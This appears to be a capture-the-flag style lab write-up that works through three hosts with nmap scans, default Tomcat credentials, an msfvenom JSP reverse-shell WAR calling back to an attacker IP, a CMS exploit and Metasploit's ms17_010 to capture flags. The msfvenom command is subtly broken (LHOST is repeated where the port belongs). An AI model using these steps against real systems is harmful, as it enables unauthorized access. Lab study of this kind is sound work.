Question 1: What is the hostname of Host-1? (Format: all lower case)
We start with a nmap scan of Host 1
Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 15:37 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.0028s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3387/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-05T19:38:48+00:00; -58s from scanner time.
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2026-04-04T19:23:28
|_Not valid after: 2026-10-04T19:23:28
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-05T19:38:42+00:00
5504/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:B0:0B:4D (VMware)
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (97%), Microsoft Windows 10 1709 - 1803 (94%), Microsoft Windows Server 2012 (93%),
Microsoft Windows Longhorn (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server
2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (91%),
Microsoft Windows 10 1809 - 1909 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h23m02s, deviation: 3h07m50s, median: -58s
| smb2-time:
| date: 2026-04-05T19:38:42
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-04-05T12:38:42-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:0b:4d (VMware)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.03 secondsThe nmap scan shows the hostname as being NetBIOS name: SHELLS-WINSVR
Question 2: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)
My first thought is to check the Apache Tomcat server exposed on port 8080. Connecting to this portal led to the manager screen, but this required credentials. I tried some default credentials, and was able to login using tomcat:Tomcatadm
From here, we have the ability to upload a WAR file. This is an attack vector we can use to generate a shell using msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LHOST=4444 -f war -o shell.warnc -lvnp 4444
Question 3: What distribution of Linux is running on Host-2? (Format: distro name, all lower case)
Let’s run an nmap scan of Host 2
Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 17:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.0096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
| 256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_ 256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:50:56:B0:FC:6E (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.57 secondsFrom the scan, we can see Host 2 runs on Ubuntu
Question 4: What language is the shell written in that gets uploaded when using the 50064.rb exploit?
A quick google search reveals this script is run in PHP, but we can also searchsploit -p 50064 to find this answer as well.
Question 5: Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt
We immediately notice from the prior section that the CMS is likely vulnerable to 50064.rb, however this vulnerability requires credentials. Let’s perform some enumeration to see if we can find any other information. From this, we discover a few sub-directories. I start with the first one, /data, and by curling this folder:
curl http://blog.inlanefreight.local/data/We discover there is a config.ini file in this folder. Opening this reveals a set of admin credentials. These may be the credentials we need to access the blog.
Running the exploit in metasploit gets us a meterpreter shell which we can use to fetch the flag.
Question 6: What is the hostname of Host-3?
sudo nmap -sC -sV -O -T5 -p- 172.16.1.13
Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 18:08 EDT
Stats: 0:02:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 18:11 (0:00:46 remaining)
Nmap scan report for 172.16.1.13
Host is up (0.0055s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:B0:08:83 (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:08:83 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h20m01s, deviation: 4h02m29s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: SHELLS-WINBLUE
| NetBIOS computer name: SHELLS-WINBLUE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-04-05T15:10:50-07:00
| smb2-time:
| date: 2026-04-05T22:10:50
|_ start_date: 2026-04-05T21:28:08
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.10 secondsThe hostname from the nmap scan is SHELLS-WINBLUE
Question 7: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
The windows server version immediately makes me suspect this server may be susceptible to ms17_010. A quick check on metasploit confirms this and we are quickly able to get access to a shell and secure the 3rd flag.
Leave a Reply